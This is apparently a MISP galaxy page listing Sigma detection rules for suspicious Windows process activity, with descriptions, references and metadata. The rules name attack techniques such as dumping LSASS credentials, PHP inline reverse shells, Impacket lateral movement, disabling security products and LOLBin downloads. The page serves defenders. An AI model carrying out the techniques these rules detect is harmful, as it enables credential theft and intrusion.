| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-09 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_schtasks_delete_all.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1489'] |
Related clusters
To see the related clusters, click here.
BitLockerTogo.EXE Execution
Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of USB flash drives, SD cards, external hard disk drives, and other drives that are formatted using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application, and any usage of it is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
Internal MISP references
UUID 7f2376f9-42ee-4dfc-9360-fecff9a88fc8 which can be used as unique global reference for BitLockerTogo.EXE Execution in MISP communities and other software using the MISP galaxy
External references
- https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/ - webarchive
- https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091 - webarchive
- https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/ - webarchive
- https://tria.ge/240521-ynezpagf56/behavioral1 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Josh Nickels, mttaggart |
| creation_date | 2024-07-11 |
| falsepositive | ['Legitimate usage of BitLockerToGo.exe to encrypt portable devices.'] |
| filename | proc_creation_win_bitlockertogo_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run for a specific VM state
Internal MISP references
UUID 7aa4e81a-a65c-4e10-9f81-b200eb229d7d which can be used as unique global reference for Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy
External references
- https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - webarchive
- https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_vmware_toolbox_cmd_persistence.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.persistence', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Potential Tampering With Security Products Via WMIC
Detects uninstallation or termination of security products using the WMIC utility
Internal MISP references
UUID 847d5ff3-8a31-4737-a970-aeae8fe21765 which can be used as unique global reference for Potential Tampering With Security Products Via WMIC in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://twitter.com/cglyer/status/1355171195654709249 - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-01-30 |
| falsepositive | ['Legitimate administration'] |
| filename | proc_creation_win_wmic_uninstall_security_products.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Potential Suspicious Activity Using SeCEdit
Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy.
Internal MISP references
UUID c2c76b77-32be-4d1f-82c9-7e544bdfe0eb which can be used as unique global reference for Potential Suspicious Activity Using SeCEdit in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit - webarchive
- https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_secedit_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Janantha Marasinghe |
| creation_date | 2022-11-18 |
| falsepositive | ['Legitimate administrative use'] |
| filename | proc_creation_win_secedit_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.discovery', 'attack.persistence', 'attack.defense-evasion', 'attack.credential-access', 'attack.privilege-escalation', 'attack.t1562.002', 'attack.t1547.001', 'attack.t1505.005', 'attack.t1556.002', 'attack.t1562', 'attack.t1574.007', 'attack.t1564.002', 'attack.t1546.008', 'attack.t1546.007', 'attack.t1547.014', 'attack.t1547.010', 'attack.t1547.002', 'attack.t1557', 'attack.t1082'] |
Arbitrary File Download Via Squirrel.EXE
Detects usage of "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron-based software installations (Slack, Teams, Discord, etc.).
Internal MISP references
UUID 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c which can be used as unique global reference for Arbitrary File Download Via Squirrel.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - webarchive
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - webarchive
- http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community |
| creation_date | 2022-06-09 |
| falsepositive | ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)'] |
| filename | proc_creation_win_squirrel_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218'] |
Suspicious Driver/DLL Installation Via Odbcconf.EXE
Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
Internal MISP references
UUID cb0fe7c5-f3a3-484d-aa25-d350a7912729 which can be used as unique global reference for Suspicious Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - webarchive
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-23 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_odbcconf_driver_install_susp.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.008'] |
Suspicious Execution of Systeminfo
Detects usage of the "systeminfo" command to retrieve information
Internal MISP references
UUID 0ef56343-059e-4cb6-adc1-4c3c967c5e46 which can be used as unique global reference for Suspicious Execution of Systeminfo in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_systeminfo_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1082'] |
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
Internal MISP references
UUID cc368ed0-2411-45dc-a222-510ace303cb2 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Regasm/ - webarchive
- https://www.fortiguard.com/threat-signal-report/4718?s=09 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-25 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.009'] |
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
Detects execution of arbitrary PowerShell code using SyncAppvPublishingServer.vbs.
Internal MISP references
UUID 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 which can be used as unique global reference for SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-07-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218', 'attack.t1216'] |
Suspicious Autorun Registry Modified via WMI
Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
Internal MISP references
UUID c80e66d8-1780-48a9-b412-46663fd21ac0 which can be used as unique global reference for Suspicious Autorun Registry Modified via WMI in MISP communities and other software using the MISP galaxy
External references
- Internal Research
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_autorun_registry_modified_via_wmic.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-02-17 |
| falsepositive | ['Legitimate administrative activity or software installations'] |
| filename | proc_creation_win_autorun_registry_modified_via_wmic.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1547.001', 'attack.t1047'] |
Use of Remote.exe
Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
Internal MISP references
UUID 4eddc365-79b4-43ff-a9d7-99422dc34b93 which can be used as unique global reference for Use of Remote.exe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @SecurePeacock, SCYTHE @scythe_io |
| creation_date | 2022-06-02 |
| falsepositive | ['Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).'] |
| filename | proc_creation_win_lolbin_remote.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
Detects execution of the Windows Defender "OfflineScannerShell.exe" binary from a non-standard directory. "OfflineScannerShell.exe" is vulnerable to DLL side-loading and will load any DLL named "mpclient.dll" from the current working directory.
Internal MISP references
UUID 02b18447-ea83-4b1b-8805-714a8a34546a which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-03-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_offlinescannershell_mpclient_sideloading.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Renamed Plink Execution
Detects the execution of a renamed version of the Plink binary
Internal MISP references
UUID 1c12727d-02bf-45ff-a9f3-d49806a3cf43 which can be used as unique global reference for Renamed Plink Execution in MISP communities and other software using the MISP galaxy
External references
- https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html - webarchive
- https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_plink.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Wscript Shell Run In CommandLine
Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command line, which could indicate suspicious activity.
Internal MISP references
UUID 2c28c248-7f50-417a-9186-a85b223010ee which can be used as unique global reference for Wscript Shell Run In CommandLine in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ - webarchive
- https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-31 |
| falsepositive | ['Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly'] |
| filename | proc_creation_win_mshta_inline_vbscript.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Uncommon Userinit Child Process
Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
Internal MISP references
UUID 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 which can be used as unique global reference for Uncommon Userinit Child Process in MISP communities and other software using the MISP galaxy
External references
- https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tom Ueltschi (@c_APT_ure), Tim Shelton |
| creation_date | 2019-01-12 |
| falsepositive | ['Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.'] |
| filename | proc_creation_win_userinit_uncommon_child_processes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.t1037.001', 'attack.persistence'] |
PUA - PingCastle Execution From Potentially Suspicious Parent
Detects the execution of PingCastle (a tool designed to quickly assess the Active Directory security level) via a script located in a potentially suspicious or uncommon location.
Internal MISP references
UUID b37998de-a70b-4f33-b219-ec36bf433dc0 which can be used as unique global reference for PUA - PingCastle Execution From Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy
External references
- https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8 - webarchive
- https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699 - webarchive
- https://github.com/vletoux/pingcastle - webarchive
- https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680 - webarchive
- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 - webarchive
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ - webarchive
- https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) |
| creation_date | 2024-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_pua_pingcastle_script_parent.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.reconnaissance', 'attack.t1595'] |
PowerShell Web Access Feature Enabled Via DISM
Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse.
Internal MISP references
UUID 7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f which can be used as unique global reference for PowerShell Web Access Feature Enabled Via DISM in MISP communities and other software using the MISP galaxy
External references
- https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41 - webarchive
- https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Michael Haag |
| creation_date | 2024-09-03 |
| falsepositive | ['Legitimate PowerShell Web Access installations by administrators'] |
| filename | proc_creation_win_dism_enable_powershell_web_access_feature.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.persistence', 'attack.t1548.002'] |
Suspicious Chromium Browser Instance Executed With Custom Extension
Detects a suspicious process spawning a Chromium-based browser process with the 'load-extension' flag to start an instance with a custom extension.
Internal MISP references
UUID 27ba3207-dd30-4812-abbf-5d20c57d474e which can be used as unique global reference for Suspicious Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/blog/chromeloader/ - webarchive
- https://www.mandiant.com/resources/blog/lnk-between-browsers - webarchive
- https://emkc.org/s/RJjuLa - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Aedan Russell, frack113, X__Junior (Nextron Systems) |
| creation_date | 2022-06-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_browsers_chromium_susp_load_extension.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1176.001'] |
HackTool - Potential Impacket Lateral Movement Activity
Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.
Internal MISP references
UUID 10c14723-61c7-4c75-92ca-9af245723ad2 which can be used as unique global reference for HackTool - Potential Impacket Lateral Movement Activity in MISP communities and other software using the MISP galaxy
External references
- https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html - webarchive
- https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py - webarchive
- https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py - webarchive
- https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py - webarchive
- https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch |
| creation_date | 2019-09-03 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_impacket_lateral_movement.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047', 'attack.lateral-movement', 'attack.t1021.003'] |
Regsvr32 Execution From Potential Suspicious Location
Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
Internal MISP references
UUID 9525dc73-0327-438c-8c04-13c0e037e9da which can be used as unique global reference for Regsvr32 Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ - webarchive
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-26 |
| falsepositive | ['Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.'] |
| filename | proc_creation_win_regsvr32_susp_exec_path_1.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.010'] |
LSASS Dump Keyword In CommandLine
Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
Internal MISP references
UUID ffa6861c-4461-4f59-8a41-578c39f3f23e which can be used as unique global reference for LSASS Dump Keyword In CommandLine in MISP communities and other software using the MISP galaxy
External references
- https://github.com/Hackndo/lsassy - webarchive
- https://github.com/helpsystems/nanodump - webarchive
- https://github.com/CCob/MirrorDump - webarchive
- https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf - webarchive
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml - webarchive
- https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-10-24 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_susp_lsass_dmp_cli_keywords.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Abusing Print Executable
Detects use of print.exe for remote file copy, a technique attackers can abuse.
Internal MISP references
UUID bafac3d6-7de9-4dd9-8874-4a1194b493ed which can be used as unique global reference for Abusing Print Executable in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative |
| creation_date | 2020-10-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_print_remote_file_copy.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
HackTool - SharpUp PrivEsc Tool Execution
Detects the use of SharpUp, a tool for local privilege escalation.
Internal MISP references
UUID c484e533-ee16-4a93-b6ac-f0ea4868b2f1 which can be used as unique global reference for HackTool - SharpUp PrivEsc Tool Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-08-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_sharpup.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1569.002', 'attack.t1574.005'] |
Php Inline Command Execution
Detects execution of php using the "-r" flag. This could be used as a way to launch a reverse shell or execute live PHP code.
Internal MISP references
UUID d81871ef-5738-47ab-9797-7a9c90cd4bfb which can be used as unique global reference for Php Inline Command Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.revshells.com/ - webarchive
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - webarchive
- https://www.php.net/manual/en/features.commandline.php - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_php_inline_command_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Suspicious File Download From IP Via Wget.EXE
Detects potentially suspicious file downloads directly from IP addresses using Wget.exe.
Internal MISP references
UUID 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wget_download_direct_ip.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Suspicious Driver Install by pnputil.exe
Detects when a possibly suspicious driver is installed via the pnputil.exe LOLBin.
Internal MISP references
UUID a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 which can be used as unique global reference for Suspicious Driver Install by pnputil.exe in MISP communities and other software using the MISP galaxy
External references
- https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html - webarchive
- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger |
| creation_date | 2021-09-30 |
| falsepositive | ['Pnputil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.'] |
| filename | proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547'] |
IIS Native-Code Module Command Line Installation
Detects suspicious IIS native-code module installations via the command line.
Internal MISP references
UUID 9465ddf4-f9e4-4ebd-8d98-702df3a93239 which can be used as unique global reference for IIS Native-Code Module Command Line Installation in MISP communities and other software using the MISP galaxy
External references
- https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ - webarchive
- https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-12-11 |
| falsepositive | ['Unknown as it may vary from organisation to organisation how admins use to install IIS modules'] |
| filename | proc_creation_win_iis_appcmd_susp_module_install.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1505.003'] |
Use of UltraVNC Remote Access Software
An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.
Internal MISP references
UUID 145322e4-0fd3-486b-81ca-9addc75736d8 which can be used as unique global reference for Use of UltraVNC Remote Access Software in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-10-02 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_ultravnc.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
